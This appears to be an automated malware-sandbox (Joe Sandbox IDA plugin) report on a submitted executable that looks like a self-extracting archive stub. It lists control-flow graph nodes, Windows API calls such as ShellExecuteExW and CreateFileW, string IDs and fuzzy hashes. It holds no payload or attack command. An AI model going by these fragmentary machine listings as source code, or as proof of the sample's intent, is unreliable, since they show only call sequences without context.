1dd519-1dd51d 616->619 618->619 625 1dd4f9-1dd513 call 1f5ec0 618->625 619->608 626 1dd51f-1dd522 619->626 620->580 642 1dd5d2-1dd5ee call 1e137a call 1f35ce 620->642 627 1dd5f1-1dd5f8 621->627 623->616 630 1dd4d1-1dd4e3 call 1f5808 623->630 625->580 625->619 626->607 633 1dd5fc-1dd625 call 1dfdfb call 1f35d3 627->633 634 1dd5fa 627->634 630->616 643 1dd527 630->643 631->580 631->596 651 1dd627-1dd62e call 1f35ce 633->651 652 1dd633-1dd649 633->652 634->633 637->610 638->612 642->627 643->638 651->580 654 1dd64f-1dd65d 652->654 655 1dd731-1dd757 call 1dce72 call 1f35ce * 2 652->655 658 1dd664-1dd669 654->658 691 1dd759-1dd76f call 1e3781 * 2 655->691 692 1dd771-1dd79d call 1f5a90 * 2 655->692 660 1dd97c-1dd984 658->660 661 1dd66f-1dd678 658->661 662 1dd72b-1dd72e 660->662 663 1dd98a-1dd98e 660->663 665 1dd67a-1dd67e 661->665 666 1dd684-1dd68b 661->666 662->655 669 1dd9de-1dd9e4 663->669 670 1dd990-1dd996 663->670 665->660 665->666 667 1dd691-1dd6b6 666->667 668 1dd880-1dd891 call 1dfcbf 666->668 674 1dd6b9-1dd6de call 1f35b3 call 1f5808 667->674 693 1dd897-1dd8c0 call 1dfe56 call 1f5885 668->693 694 1dd976-1dd979 668->694 672 1dda0a-1dda2a call 1dce72 669->672 673 1dd9e6-1dd9ec 669->673 675 1dd99c-1dd9a3 670->675 676 1dd722-1dd725 670->676 696 1dda02-1dda05 672->696 673->672 679 1dd9ee-1dd9f4 673->679 710 1dd6f6 674->710 711 1dd6e0-1dd6ea 674->711 682 1dd9ca 675->682 683 1dd9a5-1dd9a8 675->683 676->658 676->662 679->676 686 1dd9fa-1dda01 679->686 695 1dd9cc-1dd9d9 682->695 689 1dd9aa-1dd9ad 683->689 690 1dd9c6-1dd9c8 683->690 686->696 698 1dd9af-1dd9b2 689->698 699 1dd9c2-1dd9c4 689->699 690->695 691->692 692->580 693->694 720 1dd8c6-1dd93c call 1e1596 call 1dfdfb call 1dfdd4 call 1dfdfb call 1f58d9 693->720 694->660 695->676 704 1dd9be-1dd9c0 698->704 705 1dd9b4-1dd9b8 698->705 699->695 704->695 705->679 712 1dd9ba-1dd9bc 705->712 717 1dd6f9-1dd6fd 710->717 711->710 716 1dd6ec-1dd6f4 711->716 712->695 716->717 717->674 721 1dd6ff-1dd706 717->721 754 1dd93e-1dd947 720->754 755 1dd94a-1dd95f 720->755 723 1dd70c-1dd71a call 1dfdfb 721->723 724 1dd7be-1dd7c1 721->724 731 1dd71f 723->731 724->668 726 1dd7c7-1dd7ce 724->726 729 1dd7d6-1dd7d7 726->729 730 1dd7d0-1dd7d4 726->730 729->726 730->729 733 1dd7d9-1dd7e7 730->733 731->676 735 1dd7e9-1dd7ec 733->735 736 1dd808-1dd830 call 1e1596 733->736 738 1dd7ee-1dd803 735->738 739 1dd805 735->739 743 1dd853-1dd85b 736->743 744 1dd832-1dd84e call 1f35e9 736->744 738->735 738->739 739->736 747 1dd85d 743->747 748 1dd862-1dd87b call 1ddd6b 743->748 744->731 747->748 748->731 754->755 756 1dd960-1dd967 755->756 757 1dd969-1dd96d 756->757 758 1dd973-1dd974 756->758 757->731 757->758 758->756
                APIs
                • __EH_prolog.LIBCMT ref: 001DD346
                • _wcschr.LIBVCRUNTIME ref: 001DD367
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,001DD328,?), ref: 001DD382
                • __fprintf_l.LIBCMT ref: 001DD873
                  • Part of subcall function 001E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001DB652,00000000,?,?,?,0001043C), ref: 001E1396
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$$9 $*messages***$*messages***$@%s:$R$RTL$a
                • API String ID: 4184910265-731868787
                • Opcode ID: 58d41431d0ec8bdd7a115989572ad648b8896df1800083a8163da2363de9cb09
                • Instruction ID: 4d3f557395355b0b84703066bfa87c36e5332414ca6dde68e5eaca154ac38d72
                • Opcode Fuzzy Hash: 58d41431d0ec8bdd7a115989572ad648b8896df1800083a8163da2363de9cb09
                • Instruction Fuzzy Hash: 4612C371900219AACF24DFA4EC91BEEB7B5FF14304F10456BF606A7391EB719A41CB60

                Control-flow Graph

                APIs
                  • Part of subcall function 001EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001EAC85
                  • Part of subcall function 001EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001EAC96
                  • Part of subcall function 001EAC74: IsDialogMessageW.USER32(0001043C,?), ref: 001EACAA
                  • Part of subcall function 001EAC74: TranslateMessage.USER32(?), ref: 001EACB8
                  • Part of subcall function 001EAC74: DispatchMessageW.USER32(?), ref: 001EACC2
                • GetDlgItem.USER32(00000068,0022ECB0), ref: 001ECB6E
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,001EA632,00000001,?,?,001EAECB,00204F88,0022ECB0), ref: 001ECB96
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001ECBA1
                • SendMessageW.USER32(00000000,000000C2,00000000,002035B4), ref: 001ECBAF
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001ECBC5
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001ECBDF
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001ECC23
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001ECC31
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001ECC40
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001ECC67
                • SendMessageW.USER32(00000000,000000C2,00000000,0020431C), ref: 001ECC76
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: 0835579afe8eff188c7e439b383aa3f2eacd4a7688ae15acec95772fdae6c73b
                • Instruction ID: 001ecca2ef6ea979bf3a571ed37cea34b21fdcc2f53f4d44254ee620ff740d68
                • Opcode Fuzzy Hash: 0835579afe8eff188c7e439b383aa3f2eacd4a7688ae15acec95772fdae6c73b
                • Instruction Fuzzy Hash: 2D319C71185742FBE301DF20AC4EFAF7EACEBA6704F000508F691961A1DB65590DCBB6

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 795 1ece22-1ece3a call 1ee360 798 1ed08b-1ed093 795->798 799 1ece40-1ece4c call 1f35b3 795->799 799->798 802 1ece52-1ece7a call 1ef350 799->802 805 1ece7c 802->805 806 1ece84-1ece91 802->806 805->806 807 1ece95-1ece9e 806->807 808 1ece93 806->808 809 1eced6 807->809 810 1ecea0-1ecea2 807->810 808->807 812 1eceda-1ecedd 809->812 811 1eceaa-1ecead 810->811 813 1ed03c-1ed041 811->813 814 1eceb3-1ecebb 811->814 815 1ecedf-1ecee2 812->815 816 1ecee4-1ecee6 812->816 819 1ed036-1ed03a 813->819 820 1ed043 813->820 817 1ed055-1ed05d 814->817 818 1ecec1-1ecec7 814->818 815->816 821 1ecef9-1ecf0e call 1db493 815->821 816->821 822 1ecee8-1eceef 816->822 826 1ed05f-1ed061 817->826 827 1ed065-1ed06d 817->827 818->817 824 1ececd-1eced4 818->824 819->813 825 1ed048-1ed04c 819->825 820->825 830 1ecf27-1ecf32 call 1da180 821->830 831 1ecf10-1ecf1d call 1e17ac 821->831 822->821 828 1ecef1 822->828 824->809 824->811 825->817 826->827 827->812 828->821 837 1ecf4f-1ecf5c ShellExecuteExW 830->837 838 1ecf34-1ecf4b call 1db239 830->838 831->830 836 1ecf1f 831->836 836->830 840 1ed08a 837->840 841 1ecf62-1ecf6f 837->841 838->837 840->798 843 1ecf82-1ecf84 841->843 844 1ecf71-1ecf78 841->844 846 1ecf9b-1ecfba call 1ed2e6 843->846 847 1ecf86-1ecf8f 843->847 844->843 845 1ecf7a-1ecf80 844->845 845->843 848 1ecff1-1ecffd CloseHandle 845->848 846->848 865 1ecfbc-1ecfc4 846->865 847->846 856 1ecf91-1ecf99 ShowWindow 847->856 849 1ed00e-1ed01c 848->849 850 1ecfff-1ed00c call 1e17ac 848->850 854 1ed01e-1ed020 849->854 855 1ed079-1ed07b 849->855 850->849 862 1ed072 850->862 854->855 860 1ed022-1ed028 854->860 855->840 859 1ed07d-1ed07f 855->859 856->846 859->840 863 1ed081-1ed084 ShowWindow 859->863 860->855 864 1ed02a-1ed034 860->864 862->855 863->840 864->855 865->848 866 1ecfc6-1ecfd7 GetExitCodeProcess 865->866 866->848 867 1ecfd9-1ecfe3 866->867 868 1ecfea 867->868 869 1ecfe5 867->869 868->848 869->868
                APIs
                • ShellExecuteExW.SHELL32(?), ref: 001ECF54
                • ShowWindow.USER32(?,00000000), ref: 001ECF93
                • GetExitCodeProcess.KERNEL32(?,?), ref: 001ECFCF
                • CloseHandle.KERNEL32(?), ref: 001ECFF5
                • ShowWindow.USER32(?,00000001), ref: 001ED084
                  • Part of subcall function 001E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,001DBB05,00000000,.exe,?,?,00000800,?,?,001E85DF,?), ref: 001E17C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                • String ID: $.exe$.inf
                • API String ID: 3686203788-2452507128
                • Opcode ID: 8a4d985f3a0225debb7e365c8d9eefcf93c2987dccdc6f50c321d5ea5b8f426b
                • Instruction ID: 18585bc78ba7105d146d80a24a822206515be7f6f611797e4824ca01ab72d733
                • Opcode Fuzzy Hash: 8a4d985f3a0225debb7e365c8d9eefcf93c2987dccdc6f50c321d5ea5b8f426b
                • Instruction Fuzzy Hash: 72610871404BC1AADB31DF66E8146AFBBF5AF91300F08481EF5C597251D7B1898ACB92

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 870 1fa058-1fa071 871 1fa087-1fa08c 870->871 872 1fa073-1fa083 call 1fe6ed 870->872 874 1fa08e-1fa096 871->874 875 1fa099-1fa0bd MultiByteToWideChar 871->875 872->871 882 1fa085 872->882 874->875 877 1fa0c3-1fa0cf 875->877 878 1fa250-1fa263 call 1eec4a 875->878 879 1fa123 877->879 880 1fa0d1-1fa0e2 877->880 886 1fa125-1fa127 879->886 883 1fa0e4-1fa0f3 call 201a30 880->883 884 1fa101-1fa112 call 1f8518 880->884 882->871 890 1fa245 883->890 895 1fa0f9-1fa0ff 883->895 884->890 896 1fa118 884->896 889 1fa12d-1fa140 MultiByteToWideChar 886->889 886->890 889->890 893 1fa146-1fa158 call 1fa72c 889->893 894 1fa247-1fa24e call 1fa2c0 890->894 901 1fa15d-1fa161 893->901 894->878 900 1fa11e-1fa121 895->900 896->900 900->886 901->890 902 1fa167-1fa16e 901->902 903 1fa1a8-1fa1b4 902->903 904 1fa170-1fa175 902->904 906 1fa1b6-1fa1c7 903->906 907 1fa200 903->907 904->894 905 1fa17b-1fa17d 904->905 905->890 908 1fa183-1fa19d call 1fa72c 905->908 910 1fa1c9-1fa1d8 call 201a30 906->910 911 1fa1e2-1fa1f3 call 1f8518 906->911 909 1fa202-1fa204 907->909 908->894 923 1fa1a3 908->923 913 1fa23e-1fa244 call 1fa2c0 909->913 914 1fa206-1fa21f call 1fa72c 909->914 910->913 926 1fa1da-1fa1e0 910->926 911->913 922 1fa1f5 911->922 913->890 914->913 928 1fa221-1fa228 914->928 927 1fa1fb-1fa1fe 922->927 923->890 926->927 927->909 929 1fa22a-1fa22b 928->929 930 1fa264-1fa26a 928->930 931 1fa22c-1fa23c WideCharToMultiByte 929->931 930->931 931->913 932 1fa26c-1fa273 call 1fa2c0 931->932 932->894
                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001F4E35,001F4E35,?,?,?,001FA2A9,00000001,00000001,3FE85006), ref: 001FA0B2
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001FA2A9,00000001,00000001,3FE85006,?,?,?), ref: 001FA138
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001FA232
                • __freea.LIBCMT ref: 001FA23F
                  • Part of subcall function 001F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001FC13D,00000000,?,001F67E2,?,00000008,?,001F89AD,?,?,?), ref: 001F854A
                • __freea.LIBCMT ref: 001FA248
                • __freea.LIBCMT ref: 001FA26D
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: a93defe03a6ebdafcd76b91237210bcee0d26704d9a6f7eaead1ed18ce7ea769
                • Instruction ID: f2e987fc6d74d959dc3872810a13a9f476c1abe5f7a1d5e5a7f3d7ee3cf81a7e
                • Opcode Fuzzy Hash: a93defe03a6ebdafcd76b91237210bcee0d26704d9a6f7eaead1ed18ce7ea769
                • Instruction Fuzzy Hash: 7651D2F271021AAFEB258F64CC41EBB77A9EF54750F954228FE08D6141DB39DC40C6A2

                Control-flow Graph

                APIs
                  • Part of subcall function 001E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001E00A0
                  • Part of subcall function 001E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001DEB86,Crypt32.dll,00000000,001DEC0A,?,?,001DEBEC,?,?,?), ref: 001E00C2
                • OleInitialize.OLE32(00000000), ref: 001EA34E
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001EA385
                • SHGetMalloc.SHELL32(00218430), ref: 001EA38F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll$3Ro
                • API String ID: 3498096277-3613677438
                • Opcode ID: 55de0de69925b332f3022c8dac7525b23eb46b90ce165090d61f80db39b29bb3
                • Instruction ID: 4e1b781b8a506e8b842f8d08ad37d6b44257525b89c2f239068a2326959d101f
                • Opcode Fuzzy Hash: 55de0de69925b332f3022c8dac7525b23eb46b90ce165090d61f80db39b29bb3
                • Instruction Fuzzy Hash: C1F0F4B1D00209ABC710AF99D9499EFFBFCEF65701F004156E954E2241DBB456498BA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 939 1d99b0-1d99d1 call 1ee360 942 1d99dc 939->942 943 1d99d3-1d99d6 939->943 945 1d99de-1d99fb 942->945 943->942 944 1d99d8-1d99da 943->944 944->945 946 1d99fd 945->946 947 1d9a03-1d9a0d 945->947 946->947 948 1d9a0f 947->948 949 1d9a12-1d9a31 call 1d70bf 947->949 948->949 952 1d9a39-1d9a57 CreateFileW 949->952 953 1d9a33 949->953 954 1d9a59-1d9a7b GetLastError call 1db66c 952->954 955 1d9abb-1d9ac0 952->955 953->952 964 1d9a7d-1d9a9f CreateFileW GetLastError 954->964 965 1d9aaa-1d9aaf 954->965 957 1d9ae1-1d9af5 955->957 958 1d9ac2-1d9ac5 955->958 959 1d9af7-1d9b0f call 1dfe56 957->959 960 1d9b13-1d9b1e 957->960 958->957 962 1d9ac7-1d9adb SetFileTime 958->962 959->960 962->957 967 1d9aa5-1d9aa8 964->967 968 1d9aa1 964->968 965->955 969 1d9ab1 965->969 967->955 967->965 968->967 969->955
                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001D78AD,?,00000005,?,00000011), ref: 001D9A4C
                • GetLastError.KERNEL32(?,?,001D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001D9A59
                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,001D78AD,?,00000005,?), ref: 001D9A8E
                • GetLastError.KERNEL32(?,?,001D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001D9A96
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001D9ADB
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: a29174358d05ebd7825ac08f478a00c61701695948d6cca40bee12dd563a1de5
                • Instruction ID: c0c43cb4e89dc61b048d3dbe568ba047aaf065bb46a55dffc0464eb4864cff06
                • Opcode Fuzzy Hash: a29174358d05ebd7825ac08f478a00c61701695948d6cca40bee12dd563a1de5
                • Instruction Fuzzy Hash: 4B4133725447466FE320DB24DC09BDABBD4BB05324F10071AF9E4972D1E7B5A988CB91

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 998 1eac74-1eac8d PeekMessageW 999 1eac8f-1eaca3 GetMessageW 998->999 1000 1eacc8-1eaccc 998->1000 1001 1eacb4-1eacc2 TranslateMessage DispatchMessageW 999->1001 1002 1eaca5-1eacb2 IsDialogMessageW 999->1002 1001->1000 1002->1000 1002->1001
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001EAC85
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001EAC96
                • IsDialogMessageW.USER32(0001043C,?), ref: 001EACAA
                • TranslateMessage.USER32(?), ref: 001EACB8
                • DispatchMessageW.USER32(?), ref: 001EACC2
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: fd3a91b8634fda2b8ec3de89499799029b18a699e4464827226d0c2c403821c8
                • Instruction ID: df5f6ef0e0c7b73c2abd0a0115f730ceff0ff852d0263e977b1e03535d45705a
                • Opcode Fuzzy Hash: fd3a91b8634fda2b8ec3de89499799029b18a699e4464827226d0c2c403821c8
                • Instruction Fuzzy Hash: F1F01D71901129EBCB249BE2AC4CDEF7F6CEE152517404415F405D3110EB24E409C7B1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1003 1ea2c7-1ea2e6 GetClassNameW 1004 1ea30e-1ea310 1003->1004 1005 1ea2e8-1ea2fd call 1e17ac 1003->1005 1007 1ea31b-1ea31f 1004->1007 1008 1ea312-1ea315 SHAutoComplete 1004->1008 1010 1ea2ff-1ea30b FindWindowExW 1005->1010 1011 1ea30d 1005->1011 1008->1007 1010->1011 1011->1004
                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 001EA2DE
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 001EA315
                  • Part of subcall function 001E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,001DBB05,00000000,.exe,?,?,00000800,?,?,001E85DF,?), ref: 001E17C2
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 001EA305
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT
                • API String ID: 4243998846-3080729518
                • Opcode ID: f84d29d286c4ceb62954bc8eb4bbe8ebfe820907bf81e0b35bb8eaa7e3e865fc
                • Instruction ID: ff2e4884c47ac26ca2070f0ae09f8b7c03a166668761a12dad3b0f84584b4cd7
                • Opcode Fuzzy Hash: f84d29d286c4ceb62954bc8eb4bbe8ebfe820907bf81e0b35bb8eaa7e3e865fc
                • Instruction Fuzzy Hash: 89F02732A41A28B7E7306A65AC09FDF73ACAF56F00F440052BE04F3180D760AD49C6F6

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1012 1ed287-1ed2b2 call 1ee360 SetEnvironmentVariableW call 1dfbd8 1016 1ed2b7-1ed2bb 1012->1016 1017 1ed2df-1ed2e3 1016->1017 1018 1ed2bd-1ed2c1 1016->1018 1019 1ed2ca-1ed2d1 call 1dfcf1 1018->1019 1022 1ed2c3-1ed2c9 1019->1022 1023 1ed2d3-1ed2d9 SetEnvironmentVariableW 1019->1023 1022->1019 1023->1017
                APIs
                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001ED29D
                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001ED2D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: bd5f284f5763bd73d4d68bf5635899fbce43fec48aa407b9100413ab772a8ff5
                • Instruction ID: a7582024ffb40ef0bbe14ed11dcfb448d8daa4cc2c35cb787b11a81679acd96c
                • Opcode Fuzzy Hash: bd5f284f5763bd73d4d68bf5635899fbce43fec48aa407b9100413ab772a8ff5
                • Instruction Fuzzy Hash: 03F0A772811739E6D7206FD5AC09EBEB79DAF1D741B004016FD8956242D760CD50DAF1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1024 1d984e-1d985a 1025 1d985c-1d9864 GetStdHandle 1024->1025 1026 1d9867-1d987e ReadFile 1024->1026 1025->1026 1027 1d98da 1026->1027 1028 1d9880-1d9889 call 1d9989 1026->1028 1029 1d98dd-1d98e2 1027->1029 1032 1d988b-1d9893 1028->1032 1033 1d98a2-1d98a6 1028->1033 1032->1033 1034 1d9895 1032->1034 1035 1d98a8-1d98b1 GetLastError 1033->1035 1036 1d98b7-1d98bb 1033->1036 1037 1d9896-1d98a0 call 1d984e 1034->1037 1035->1036 1038 1d98b3-1d98b5 1035->1038 1039 1d98bd-1d98c5 1036->1039 1040 1d98d5-1d98d8 1036->1040 1037->1029 1038->1029 1039->1040 1042 1d98c7-1d98d0 GetLastError 1039->1042 1040->1029 1042->1040 1044 1d98d2-1d98d3 1042->1044 1044->1037
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 001D985E
                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 001D9876
